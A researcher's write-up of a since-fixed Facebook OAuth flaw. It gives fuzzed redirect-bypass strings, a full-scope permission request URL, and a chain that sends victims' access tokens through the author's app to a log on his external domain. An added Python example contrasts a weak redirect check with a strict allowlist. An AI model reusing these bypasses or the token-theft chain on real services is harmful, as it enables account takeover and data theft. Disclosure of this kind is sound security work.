How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account (Without App "Allow" Interaction)
Hi,
This flaw allowed me to take full control over any Facebook account: by exploiting it I could steal access tokens that give me full control over the victim's account.
Just to clarify, there is no need for any installed apps on the victim's account. Even if the victim never allowed any application on his Facebook account, I could still get full permissions (this bug works on any browser).
To make this exploit work, the victim only needs to visit a webpage.
So, OAuth is used by Facebook to communicate between applications and Facebook users. Usually users must allow/accept the application's request to access their account before the communication can start.
Any Facebook application might ask for different permissions. For example, Diamond Dash and Texas Holdem Poker only have permission to read basic information and post on the user's wall.
I found a way to get full permissions (read inbox, outbox, manage pages, manage ads, read private photos, videos, etc.) over the victim's account, even without any installed apps on the victim's account.
Another advantage of the flaw I found is that the token has no expiry date, unlike a token obtained through any other application usage: in my attack the token never expires unless the victim changes his password :)
So, the URL of the OAuth dialog looks like this:
https://www.facebook.com/dialog/oauth/?app_id=YOUR_APP_ID&next=YOUR_REDIRECT_URL&state=YOUR_STATE_VALUE&scope=COMMA_SEPARATED_LIST_OF_PERMISSION_NAMES
Every application in Facebook has a different app_id. For example, 'Diamond Dash' would be app_id=2 and 'Texas Holdem Poker' would be app_id=3.
The next/redirect_uri parameter (next=, redirect_uri=) only accepts the domain of the app's owner. For example, app_id=2389801228 belongs to the 'Texas Holdem Poker' app, so the 'next' parameter will only allow the zynga.com domain (i.e. next=http://zynga.com). If the domain in the 'next' or 'redirect_uri' parameter is different (nirgoldshlager.com), Facebook will block the action.
Facebook performs a match between your app_id and your next parameter. Facebook also sends the access token via a GET request to the owner application after the user has allowed it.
Now that we know how Facebook OAuth works, let's talk about my finding.
I started to think about my options: what if I could redirect the application's OAuth request to a different 'next' URL? First I tried to change the 'next' parameter to a different domain, and they blocked my action. Then I tried to change the next parameter to the facebook.com domain, and got blocked again with a general error message.
I found that if you use a sub-domain, for example xxx.facebook.com, Facebook will allow this. But if you try to access folders/files in x.facebook.com (x.facebook.com/xx/x.php), Facebook blocks you. I also tried this in the next parameter (next=x.facebook.com/%23!/), and Facebook blocked me again!
Seems that there is a regex protection. Cool!
But wait!
If we put something like https://beta.facebook.com/#xxx!/messages/, the client will not treat it the same as #! and will not redirect us to the messages screen. I figured I had to find a way around it, so I started to fuzz characters between the # and the ! so that any browser (IE, Chrome, Safari, Firefox, ...) would treat it like #!.
Now it's time for fuzzing!
Result:
%23~! (Works on all browsers)
%23%09! (Works on all browsers)
Cool! This trick works on touch.facebook.com/#%09!/, m.facebook.com/#~!/, or any other Facebook mobile/touch domain.
So now I'm able to redirect the victim to any file/directory in any Facebook sub-domain.
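The redirect check described above (any sub-domain allowed, paths and a literal #! blocked, but %23~! and %23%09! let through) is the shape of a suffix-plus-blocklist validator that fails open. The Python below is an added example and not Facebook's code: `weak_redirect_check` is a hypothetical reconstruction of such a lenient check, and `strict_redirect_check` shows the exact-match allowlist a provider should use instead. The registry `REGISTERED_REDIRECTS`, the assumed registered URI `https://zynga.com/` for app_id 2389801228, and the helper `compare` are constructed for this illustration.

```python
"""Redirect-URI validation: a lenient suffix/blocklist check beside a strict
exact-match allowlist. Added illustration; neither function is Facebook's code."""
import re
from urllib.parse import unquote, urlsplit

# Constructed registry: app_id -> registered redirect URIs. The app_id is the one
# quoted in the post; the registered URI itself is an assumption.
REGISTERED_REDIRECTS = {
    "2389801228": {"https://zynga.com/"},
}
PROVIDER_DOMAIN = "facebook.com"  # the weak check trusts every sub-domain of this


def weak_redirect_check(app_id: str, candidate: str) -> bool:
    """Hypothetical reconstruction of a lenient check: percent-decode, blocklist
    the literal '#!' router prefix, drop the fragment, then accept the owner's
    domain or any provider sub-domain as long as no path is left."""
    decoded = unquote(candidate)
    if "#!" in decoded:                      # blocklist, so '#~!' and '#<tab>!' slip past
        return False
    without_fragment = decoded.split("#", 1)[0]
    parts = urlsplit(without_fragment)
    host = (parts.hostname or "").lower()
    if parts.path not in ("", "/"):          # "files/directories" are blocked
        return False
    if host == PROVIDER_DOMAIN or host.endswith("." + PROVIDER_DOMAIN):
        return True
    registered_hosts = {urlsplit(u).hostname for u in REGISTERED_REDIRECTS.get(app_id, ())}
    return host in registered_hosts


# Percent-encoded '#' (%23) or any ASCII control character (%00-%1f, %7f)
_ENCODED_CTRL_OR_HASH = re.compile(r"%(?:0[0-9a-f]|1[0-9a-f]|7f|23)", re.IGNORECASE)


def strict_redirect_check(app_id: str, candidate: str) -> bool:
    """Exact-match allowlist: the candidate, compared without any decoding, must be
    one of the app's registered absolute https URIs. Fragments, encoded '#' or
    control characters, userinfo, non-default ports and query strings are refused."""
    if "#" in candidate or _ENCODED_CTRL_OR_HASH.search(candidate):
        return False
    parts = urlsplit(candidate)
    if parts.scheme != "https" or not parts.hostname or parts.query:
        return False
    try:
        port = parts.port                    # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.username is not None or port not in (None, 443):
        return False
    normalized = f"https://{parts.hostname.lower()}{parts.path or '/'}"
    return normalized in REGISTERED_REDIRECTS.get(app_id, set())


# Constructed candidates taken from the post: the legitimate owner redirect, the
# two strings that got through, and the two that were blocked.
CANDIDATES = [
    "https://zynga.com/",
    "https://beta.facebook.com/%23~!/messages/",
    "https://touch.facebook.com/%23%09!/",
    "https://beta.facebook.com/%23!/messages/",
    "https://x.facebook.com/xx/x.php",
]


def compare(app_id: str = "2389801228") -> dict:
    """Return {candidate: (weak verdict, strict verdict)} for the sample list."""
    return {c: (weak_redirect_check(app_id, c), strict_redirect_check(app_id, c))
            for c in CANDIDATES}


if __name__ == "__main__":
    for cand, (weak, strict) in compare().items():
        print(f"{cand:45} weak={weak!s:5} strict={strict}")
```

Running the block prints one row per candidate; the two bypass strings pass the weak check and fail the strict one, while only the registered `https://zynga.com/` passes the strict check. The design point is that the strict function never decodes, never stores a host suffix, and never keeps a blocklist: anything not byte-for-byte equal to a registered URI is refused, so there is no character to fuzz for.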
Then I created a Facebook application that redirects the victim to an external website, sending the victim's access_token to my "malicious" external website.
For example (Zynga Texas Holdem OAuth bypass):
https://www.facebook.com/
The next parameter redirects to my Facebook application (touch.facebook.com/apps/testestestte), and my Facebook application redirects to the files.nirgoldshlager.com domain and saves the victim's access_token in a log file (files.nirgoldshlager.com/log.txt).
Amazing! Now I'm able to steal access tokens of any Facebook application.
But wait!!!
HERE COMES THE REAL DEAL:
To make a successful attack, the victim needs to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc.), and these applications only have basic permissions. We can always change the scope of the application's permissions and request new ones, but this method is not powerful, because the victim needs to accept the new permissions of the app (https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests).
I wanted something more powerful!
Something that would give me full permissions (read inbox, outbox, manage pages, manage ads, access to private photos, videos, etc.) on the victim's account without any installed application on the victim's side, and make Facebook do the Goldshake ;)
So I started thinking: how can this be done?
What if I use a different app_id? The app_id of Facebook Messenger, for example.
Does the user need to accept the Facebook Messenger app in his Facebook account?
The answer is no.
There are built-in applications in Facebook that users never need to accept, and these applications have full control over your account.
I also found that this access_token never expires for Facebook Messenger. Only after the victim changes his password will the access_token expire, but why the hell would the user change his password?
PoC (works on all browsers, no need for an installed application on the victim's account):
https://www.facebook.com/
Facebook Security fixed this bug.
Full description of the permissions of the Facebook Messenger app:
ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login
Works also on accounts with 2-step verification: when it comes to the access_token, 2-step verification fails to protect the account.
And???,
PoC Video: http://player.vimeo.com/video/60324292?title=0&byline=0&portrait=0&color=cccccc